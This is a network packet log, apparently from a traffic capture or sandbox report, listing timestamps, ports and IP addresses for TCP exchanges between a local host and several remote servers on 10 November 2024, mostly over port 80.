Nov 10, 2024 04:55:25.342581034 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.342581987 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.342606068 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.342614889 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.342617035 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.342632055 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.342639923 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.342639923 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.342644930 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.342662096 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.342669964 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.342678070 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.342693090 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.342693090 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.342714071 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.342722893 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.342747927 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.342750072 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.342762947 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.342775106 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.342787027 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.342797995 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.342811108 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.342819929 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.342848063 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.342859030 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.342889071 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.342902899 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.342916965 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.342928886 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.342936993 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.342969894 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.342969894 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.342971087 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.343028069 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.343063116 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.343081951 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.343086958 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.343100071 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.343111038 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.343132019 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.343132019 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.343187094 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.343199015 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.343209982 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.343224049 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.343244076 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.343244076 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.343271971 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.343282938 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.343292952 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.343328953 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.343331099 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.343342066 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.343350887 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.343367100 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.343377113 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.343389034 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.343399048 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.343399048 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.343400955 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.343425035 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.343444109 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.343446970 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.343446970 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.343456030 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.343465090 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.343477964 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.343480110 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.343480110 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.343492985 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.343513012 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.343522072 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.343525887 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.343538046 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.343548059 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.343548059 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.343576908 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.343588114 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.343600035 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.343611002 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.343624115 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.343624115 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.343624115 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.343635082 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.343669891 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.343681097 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.343689919 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.343703032 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.343714952 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.343724966 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.343724966 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.343755960 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.343765020 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.343765020 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.343782902 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.343792915 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.343806982 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.343831062 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.343842983 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.343857050 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.343857050 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.343867064 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.343878031 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.343889952 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.343907118 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.343907118 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.343909979 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.343928099 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.343940973 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.343950033 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.343950033 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.343952894 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.343966007 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.343972921 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.343972921 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.343981981 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.343996048 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.344006062 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.344006062 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.344033957 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.344043970 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.344043970 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.344059944 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.344070911 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.344106913 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.344106913 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.344106913 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.344161034 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.344171047 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.344183922 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.344194889 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.344203949 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.344219923 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.344235897 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.344243050 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.344248056 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.344268084 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.344290972 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.344290972 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.344304085 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.344316006 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.344316006 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.344366074 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.344389915 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.344455957 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.344521046 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.344530106 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.344544888 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.344568014 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.344578981 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.344585896 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.344585896 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.344592094 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.344603062 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.344615936 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.344634056 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.344638109 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.344649076 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.344650984 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.344650984 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.344681978 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.344695091 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.344719887 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.344777107 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.344778061 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.344798088 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.344805002 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.344818115 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.344827890 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.344836950 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.344836950 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.344840050 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.344854116 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.344866037 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.344882011 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.344882011 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.344954014 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.345307112 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.345360994 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.345377922 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.345432043 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.345434904 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.345434904 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.345443010 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.345452070 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.345479012 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.345479012 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.345494986 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.345509052 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.345520020 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.345540047 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.345551968 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.345599890 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.345599890 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.345616102 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.345638037 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.345658064 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.345662117 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.345668077 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.345683098 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.345705032 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.345705032 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.345736027 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.345746040 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.345757961 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.345803022 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.345803022 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.345807076 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.345834970 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.345854044 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.345886946 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.345899105 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.345913887 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.345933914 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.345947027 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.345959902 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.346076012 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.346103907 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.346113920 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.346126080 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.346148014 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.346160889 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.346172094 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.346172094 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.346198082 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.346198082 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.346226931 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.346235991 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.346313953 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.346326113 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.346335888 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.346348047 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.346360922 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.346409082 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.346419096 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.346431971 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.346436024 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.346458912 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.346470118 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.346476078 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.346482038 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.346512079 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.346606016 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.346631050 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.346637964 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.346645117 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.346669912 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.346700907 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.346710920 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.346723080 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.346724033 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.346746922 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.346756935 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.346777916 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.346786976 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.346796989 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.346807003 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.346807003 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.346817017 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.346826077 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.346858978 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.346865892 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.346894026 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.346908092 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.346923113 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.346934080 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.346944094 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.346951962 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.346951962 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.346961975 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.347043991 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.347054005 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.347055912 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.347079992 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.347093105 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.347098112 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.347098112 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.347103119 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.347146034 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.347198009 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.368066072 CET	49854	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:25.394126892 CET	443	49853	20.96.153.111	192.168.2.5
Nov 10, 2024 04:55:25.394407988 CET	49853	443	192.168.2.5	20.96.153.111
Nov 10, 2024 04:55:25.394418001 CET	443	49853	20.96.153.111	192.168.2.5
Nov 10, 2024 04:55:25.394745111 CET	443	49853	20.96.153.111	192.168.2.5
Nov 10, 2024 04:55:25.395585060 CET	49853	443	192.168.2.5	20.96.153.111
Nov 10, 2024 04:55:25.395663023 CET	443	49853	20.96.153.111	192.168.2.5
Nov 10, 2024 04:55:25.395845890 CET	49853	443	192.168.2.5	20.96.153.111
Nov 10, 2024 04:55:25.418252945 CET	443	49854	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:25.418451071 CET	443	49854	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:25.418642044 CET	49854	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:25.421595097 CET	49854	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:25.421603918 CET	443	49854	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:25.441297054 CET	49868	443	192.168.2.5	20.125.209.212
Nov 10, 2024 04:55:25.441310883 CET	443	49868	20.125.209.212	192.168.2.5
Nov 10, 2024 04:55:25.441391945 CET	49868	443	192.168.2.5	20.125.209.212
Nov 10, 2024 04:55:25.441996098 CET	49868	443	192.168.2.5	20.125.209.212
Nov 10, 2024 04:55:25.442006111 CET	443	49868	20.125.209.212	192.168.2.5
Nov 10, 2024 04:55:25.443329096 CET	443	49853	20.96.153.111	192.168.2.5
Nov 10, 2024 04:55:25.446166039 CET	49853	443	192.168.2.5	20.96.153.111
Nov 10, 2024 04:55:25.458559036 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.458581924 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.458592892 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.458611012 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.458626986 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.458636999 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.458657026 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.458669901 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.458697081 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.458698034 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.458709955 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.458736897 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.458736897 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.458741903 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.458753109 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.458762884 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.458776951 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.458777905 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.458777905 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.458798885 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.458802938 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.458802938 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.458820105 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.458832026 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.458842039 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.458842039 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.458843946 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.458863974 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.458863974 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.458875895 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.458909035 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.458944082 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.458954096 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.458966017 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.458978891 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.458978891 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.458990097 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.459009886 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.459022999 CET	49771	80	192.168.2.5	185.215.113.206
